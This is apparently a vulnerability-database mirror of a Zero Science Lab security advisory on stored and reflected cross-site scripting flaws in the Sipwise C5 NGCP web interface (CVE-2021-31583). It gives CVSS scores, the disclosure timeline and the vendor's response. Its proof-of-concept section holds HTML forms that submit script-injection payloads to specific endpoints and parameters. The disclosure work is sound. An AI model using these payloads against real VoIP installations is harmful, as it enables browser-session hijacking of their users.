Lucene search

K
zeroscienceGjoko KrsticZSL-2021-5648
HistoryApr 23, 2021 - 12:00 a.m.

Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities

2021-04-2300:00:00
Gjoko Krstic
zeroscience.mk
79
sipwise c5 ngcp
xss vulnerabilities
voip soft-switch
cross-site scripting
security advisory

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

5.7

Confidence

High

EPSS

0.006

Percentile

78.8%

Title: Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
Advisory ID: ZSL-2021-5648
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 23.04.2021

Summary

Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, conferencing etc.) that can be configured by end users in the self-care web interface. For operators, it offers a web-based administrative panel that allows them to configure subscribers, SIP peerings, billing profiles, and other entities. The administrative web panel also shows the real-time statistics for the whole system. For tight integration into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Description

Sipwise software platform suffers from multiple authenticated stored and reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

Sipwise GmbH - <https://www.sipwise.com>

Affected Version

<=CE_mr9.3.1
NGCP www_admin version 3.6.7

Tested On

Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx

Vendor Status

[13.04.2021] Vulnerability discovered.
[19.04.2021] Contact with the vendor.
[22.04.2021] No response from the vendor.
[23.04.2021] Public security advisory released.
[26.04.2021] Vendor responds with clarification of vulnerable versions and working on fixes.
[26.04.2021] NGCP www_admin version 3.6.7 has not been in use since mr3.0, 7+ years ago, and that component has been completely abandoned around 4 years ago: <https://github.com/sipwise/www_admin/&gt;
[26.04.2021] The ‘addressbook’ is distinct from the ‘phonebook’ and was available only on www_csc, which has not been used for 7 years now.

PoC

sipwise_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://vulners.com/cve/CVE-2021-31583&gt;
[2] <https://nvd.nist.gov/vuln/detail/CVE-2021-31583&gt;
[3] <https://www.exploit-db.com/exploits/49800&gt;
[4] <https://packetstormsecurity.com/files/162316&gt;
[5] <https://cxsecurity.com/issue/WLB-2021040136&gt;
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/200605&gt;
[7] <https://www.incibe-cert.es/alerta-temprana/vulnerabilidades/cve-2021-31583&gt;

Changelog

[23.04.2021] - Initial release
[25.04.2021] - Added reference [5], [6] and [7]
[06.05.2021] - Added vendor status

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities


Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: &lt;=CE_mr9.3.1
                  NGCP www_admin version 3.6.7

Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.

Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.

Tested on: Apache/2.2.22 (Debian)
           Apache/2.2.16 (Debian)
           nginx


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php

CVE ID: CVE-2021-31583
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31583


13.04.2021

--


Stored XSS (POST tsetname):
---------------------------


  </p>
<form action="https://10.0.1.7/callforward/time/set/save" method="POST">
<input name="tsetname" type="hidden" value='"&gt;&lt;script&gt;confirm(251)&lt;/script&gt;'/>
<input name="subscriber_id" type="hidden" value="401"/>
<input name="x" type="hidden" value="90027"/>
<input name="y" type="hidden" value="-1"/>
<input type="submit" value="Go for callforward"/>
</form>
  



Reflected XSS (GET filter):
---------------------------


  
    <form action="https://10.0.1.7/addressbook" method="GET">
<input name="filter" type="hidden" value='"&gt;&lt;script&gt;confirm(251)&lt;/script&gt;'/>
<input name="x" type="hidden" value="0"/>
<input name="y" type="hidden" value="0"/>
<input type="submit" value="Go for addressbook"/>
</form>
  



Stored XSS (POST firstname, lastname, company):
-----------------------------------------------


  
    <form action="https://10.0.1.7/addressbook/save" method="POST">
<input name="firstname" type="hidden" value='"&gt;&lt;script&gt;alert(251)&lt;/script&gt;'/>
<input name="lastname" type="hidden" value='"&gt;&lt;script&gt;alert(251)&lt;/script&gt;'/>
<input name="company" type="hidden" value='"&gt;&lt;script&gt;alert(251)&lt;/script&gt;'/>
<input name="homephonenumber" type="hidden" value="1112223333"/>
<input name="phonenumber" type="hidden" value="3332221111"/>
<input name="mobilenumber" type="hidden" value=""/>
<input name="faxnumber" type="hidden" value=""/>
<input name="email" type="hidden" value="lab%40zeroscience.mk"/>
<input name="homepage" type="hidden" value=""/>
<input name="id" type="hidden" value=""/>
<input name="x" type="hidden" value="89957"/>
<input name="y" type="hidden" value="21"/>
<input type="submit" value="Go for addressbook 2"/>
</form>
  



Reflected XSS (GET lang):
-------------------------


  
    <form action="https://10.0.1.7/statistics/versions" method="GET">
<input name="lang" type="hidden" value="en'-alert(251)-'ZSL"/>
<input type="submit" value="Go for statistics"/>
</form>
</body></html>

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

5.7

Confidence

High

EPSS

0.006

Percentile

78.8%

Related for ZSL-2021-5648